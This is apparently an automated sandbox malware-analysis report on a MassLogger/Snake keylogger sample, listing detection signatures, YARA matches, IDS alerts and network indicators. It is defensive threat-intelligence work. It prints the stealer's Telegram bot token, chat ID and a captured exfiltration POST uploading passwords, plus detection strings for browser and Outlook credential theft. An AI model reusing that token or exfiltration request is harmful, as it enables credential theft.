Edit tour

Windows Analysis Report
slime crypted.exe

Overview

General Information

Sample name:	slime crypted.exe
Analysis ID:	1590070
MD5:	b3fec0c78c0dd85b50c6d60d17e74b0b
SHA1:	8af77b3c5e287c31949d84d8a83c52ad5971ab4c
SHA256:	4120a4a8c8a1fb238464ad39e72baa8afcead746bab20e8979c427f09454df88
Tags:	exeuser-James_inthe_box
Infos:

Detection

MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

slime crypted.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\slime crypted.exe" MD5: B3FEC0C78C0DD85B50C6D60D17E74B0B)

RegAsm.exe (PID: 4220 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7800094213:AAHMlhEKdMHtO4l2EyUO6FynQMpnQElXees/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7800094213:AAHMlhEKdMHtO4l2EyUO6FynQMpnQElXees", "Telegram Chatid": "7832108732"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xefb7:$a1: get_encryptedPassword 0xf2df:$a2: get_encryptedUsername 0xed52:$a3: get_timePasswordChanged 0xee73:$a4: get_passwordField 0xefcd:$a5: set_encryptedPassword 0x10929:$a7: get_logins 0x105da:$a8: GetOutlookPasswords 0x103cc:$a9: StartKeylogger 0x10879:$a10: KeyLoggerEventArgs 0x10429:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x104837:$a1: get_encryptedPassword 0x11b667:$a1: get_encryptedPassword 0x132aa7:$a1: get_encryptedPassword 0x104b5f:$a2: get_encryptedUsername 0x11b98f:$a2: get_encryptedUsername 0x132dcf:$a2: get_encryptedUsername 0x1045d2:$a3: get_timePasswordChanged 0x11b402:$a3: get_timePasswordChanged 0x132842:$a3: get_timePasswordChanged 0x1046f3:$a4: get_passwordField 0x11b523:$a4: get_passwordField 0x132963:$a4: get_passwordField 0x10484d:$a5: set_encryptedPassword 0x11b67d:$a5: set_encryptedPassword 0x132abd:$a5: set_encryptedPassword 0x1061a9:$a7: get_logins 0x11cfd9:$a7: get_logins 0x134419:$a7: get_logins 0x105e5a:$a8: GetOutlookPasswords 0x11cc8a:$a8: GetOutlookPasswords 0x1340ca:$a8: GetOutlookPasswords
00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: slime crypted.exe PID: 6600	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: slime crypted.exe PID: 6600	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: slime crypted.exe PID: 6600	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: slime crypted.exe PID: 6600	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: slime crypted.exe PID: 6600	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd65e:$a1: get_encryptedPassword 0xd8ec:$a2: get_encryptedUsername 0xd41a:$a3: get_timePasswordChanged 0xd52e:$a4: get_passwordField 0xd674:$a5: set_encryptedPassword 0xea69:$a7: get_logins 0xe7bc:$a8: GetOutlookPasswords 0xe60c:$a9: StartKeylogger 0xe9ce:$a10: KeyLoggerEventArgs 0xe669:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegAsm.exe PID: 4220	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 4220	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 4220	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 4220	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x48327:$a1: get_encryptedPassword 0x48640:$a2: get_encryptedUsername 0x480d6:$a3: get_timePasswordChanged 0x481f7:$a4: get_passwordField 0x4833d:$a5: set_encryptedPassword 0x49c40:$a7: get_logins 0x498f1:$a8: GetOutlookPasswords 0x496e3:$a9: StartKeylogger 0x49b90:$a10: KeyLoggerEventArgs 0x49740:$a11: KeyLoggerEventArgsEventHandler
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x105cc:$a9: StartKeylogger 0x10a79:$a10: KeyLoggerEventArgs 0x10629:$a11: KeyLoggerEventArgsEventHandler
3.2.RegAsm.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14163:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13661:$a3: \Google\Chrome\User Data\Default\Login Data 0x1396f:$a4: \Orbitum\User Data\Default\Login Data 0x14767:$a5: \Kometa\User Data\Default\Login Data
0.2.slime crypted.exe.3e8e680.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.slime crypted.exe.3e8e680.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.slime crypted.exe.3e8e680.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.slime crypted.exe.3e8e680.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3b7:$a1: get_encryptedPassword 0xd6df:$a2: get_encryptedUsername 0xd152:$a3: get_timePasswordChanged 0xd273:$a4: get_passwordField 0xd3cd:$a5: set_encryptedPassword 0xed29:$a7: get_logins 0xe9da:$a8: GetOutlookPasswords 0xe7cc:$a9: StartKeylogger 0xec79:$a10: KeyLoggerEventArgs 0xe829:$a11: KeyLoggerEventArgsEventHandler
0.2.slime crypted.exe.3e8e680.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12363:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11861:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b6f:$a4: \Orbitum\User Data\Default\Login Data 0x12967:$a5: \Kometa\User Data\Default\Login Data
0.2.slime crypted.exe.3e8e680.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.slime crypted.exe.3e8e680.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.slime crypted.exe.3e8e680.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.slime crypted.exe.3e8e680.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0x25fe7:$a1: get_encryptedPassword 0x3d427:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0x2630f:$a2: get_encryptedUsername 0x3d74f:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0x25d82:$a3: get_timePasswordChanged 0x3d1c2:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0x25ea3:$a4: get_passwordField 0x3d2e3:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x25ffd:$a5: set_encryptedPassword 0x3d43d:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x27959:$a7: get_logins 0x3ed99:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x2760a:$a8: GetOutlookPasswords 0x3ea4a:$a8: GetOutlookPasswords
0.2.slime crypted.exe.3e8e680.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14163:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2af93:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x423d3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13661:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a491:$a3: \Google\Chrome\User Data\Default\Login Data 0x418d1:$a3: \Google\Chrome\User Data\Default\Login Data 0x1396f:$a4: \Orbitum\User Data\Default\Login Data 0x2a79f:$a4: \Orbitum\User Data\Default\Login Data 0x41bdf:$a4: \Orbitum\User Data\Default\Login Data 0x14767:$a5: \Kometa\User Data\Default\Login Data 0x2b597:$a5: \Kometa\User Data\Default\Login Data 0x429d7:$a5: \Kometa\User Data\Default\Login Data
0.2.slime crypted.exe.3e1e7e0.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.slime crypted.exe.3e1e7e0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.slime crypted.exe.3e1e7e0.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.slime crypted.exe.3e1e7e0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7f057:$a1: get_encryptedPassword 0x95e87:$a1: get_encryptedPassword 0xad2c7:$a1: get_encryptedPassword 0x7f37f:$a2: get_encryptedUsername 0x961af:$a2: get_encryptedUsername 0xad5ef:$a2: get_encryptedUsername 0x7edf2:$a3: get_timePasswordChanged 0x95c22:$a3: get_timePasswordChanged 0xad062:$a3: get_timePasswordChanged 0x7ef13:$a4: get_passwordField 0x95d43:$a4: get_passwordField 0xad183:$a4: get_passwordField 0x7f06d:$a5: set_encryptedPassword 0x95e9d:$a5: set_encryptedPassword 0xad2dd:$a5: set_encryptedPassword 0x809c9:$a7: get_logins 0x977f9:$a7: get_logins 0xaec39:$a7: get_logins 0x8067a:$a8: GetOutlookPasswords 0x974aa:$a8: GetOutlookPasswords 0xae8ea:$a8: GetOutlookPasswords
0.2.slime crypted.exe.3e1e7e0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x84003:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x9ae33:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xb2273:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x83501:$a3: \Google\Chrome\User Data\Default\Login Data 0x9a331:$a3: \Google\Chrome\User Data\Default\Login Data 0xb1771:$a3: \Google\Chrome\User Data\Default\Login Data 0x8380f:$a4: \Orbitum\User Data\Default\Login Data 0x9a63f:$a4: \Orbitum\User Data\Default\Login Data 0xb1a7f:$a4: \Orbitum\User Data\Default\Login Data 0x84607:$a5: \Kometa\User Data\Default\Login Data 0x9b437:$a5: \Kometa\User Data\Default\Login Data 0xb2877:$a5: \Kometa\User Data\Default\Login Data
0.2.slime crypted.exe.3e4ae10.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.slime crypted.exe.3e4ae10.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.slime crypted.exe.3e4ae10.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.slime crypted.exe.3e4ae10.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x52a27:$a1: get_encryptedPassword 0x69857:$a1: get_encryptedPassword 0x80c97:$a1: get_encryptedPassword 0x52d4f:$a2: get_encryptedUsername 0x69b7f:$a2: get_encryptedUsername 0x80fbf:$a2: get_encryptedUsername 0x527c2:$a3: get_timePasswordChanged 0x695f2:$a3: get_timePasswordChanged 0x80a32:$a3: get_timePasswordChanged 0x528e3:$a4: get_passwordField 0x69713:$a4: get_passwordField 0x80b53:$a4: get_passwordField 0x52a3d:$a5: set_encryptedPassword 0x6986d:$a5: set_encryptedPassword 0x80cad:$a5: set_encryptedPassword 0x54399:$a7: get_logins 0x6b1c9:$a7: get_logins 0x82609:$a7: get_logins 0x5404a:$a8: GetOutlookPasswords 0x6ae7a:$a8: GetOutlookPasswords 0x822ba:$a8: GetOutlookPasswords
0.2.slime crypted.exe.3e4ae10.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x579d3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x6e803:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x85c43:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x56ed1:$a3: \Google\Chrome\User Data\Default\Login Data 0x6dd01:$a3: \Google\Chrome\User Data\Default\Login Data 0x85141:$a3: \Google\Chrome\User Data\Default\Login Data 0x571df:$a4: \Orbitum\User Data\Default\Login Data 0x6e00f:$a4: \Orbitum\User Data\Default\Login Data 0x8544f:$a4: \Orbitum\User Data\Default\Login Data 0x57fd7:$a5: \Kometa\User Data\Default\Login Data 0x6ee07:$a5: \Kometa\User Data\Default\Login Data 0x86247:$a5: \Kometa\User Data\Default\Login Data
Click to see the 20 entries

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T15:02:06.470072+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49711	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T15:01:57.461112+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49706	193.122.130.0	80	TCP
2025-01-13T15:02:05.429842+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49706	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T15:02:06.075539+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49711	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: slime crypted.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7800094213:AAHMlhEKdMHtO4l2EyUO6FynQMpnQElXees", "Telegram Chatid": "7832108732"}
Source: RegAsm.exe.4220.3.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7800094213:AAHMlhEKdMHtO4l2EyUO6FynQMpnQElXees/sendMessage"}

Multi AV Scanner detection for submitted file

Source: slime crypted.exe	Virustotal: Detection: 41%			Perma Link
Source: slime crypted.exe	ReversingLabs: Detection: 54%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: slime crypted.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: slime crypted.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49707 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2

Source: slime crypted.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: G:\IMPORTANT SRC\GOOD Nova\Crypter\Stubs Fully\Public\Public Runpe\PR\PR\obj\Debug\Poses.pdb source: slime crypted.exe, 00000000.00000002.2048959964.0000000002D91000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 01425782h	3_2_01425366
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 014251B9h	3_2_01424F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 01425782h	3_2_014256AF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49711 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49711 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7800094213:AAHMlhEKdMHtO4l2EyUO6FynQMpnQElXees/sendDocument?chat_id=7832108732&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33b0f3248bb0Host: api.telegram.orgContent-Length: 1088Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 193.122.130.0:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49707 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7800094213:AAHMlhEKdMHtO4l2EyUO6FynQMpnQElXees/sendDocument?chat_id=7832108732&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33b0f3248bb0Host: api.telegram.orgContent-Length: 1088Connection: Keep-Alive

Source: RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4504752369.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: slime crypted.exe, 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: slime crypted.exe, 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000003076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7800094213:AAHMlhEKdMHtO4l2EyUO6FynQMpnQElXees/sendDocument?chat_id=7832
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: slime crypted.exe, 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: RegAsm.exe, 00000003.00000002.4504752369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.slime crypted.exe.3e8e680.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.slime crypted.exe.3e8e680.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.slime crypted.exe.3e8e680.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.slime crypted.exe.3e8e680.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.slime crypted.exe.3e1e7e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.slime crypted.exe.3e1e7e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.slime crypted.exe.3e4ae10.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.slime crypted.exe.3e4ae10.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.4503437945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2049154792.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: slime crypted.exe PID: 6600, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
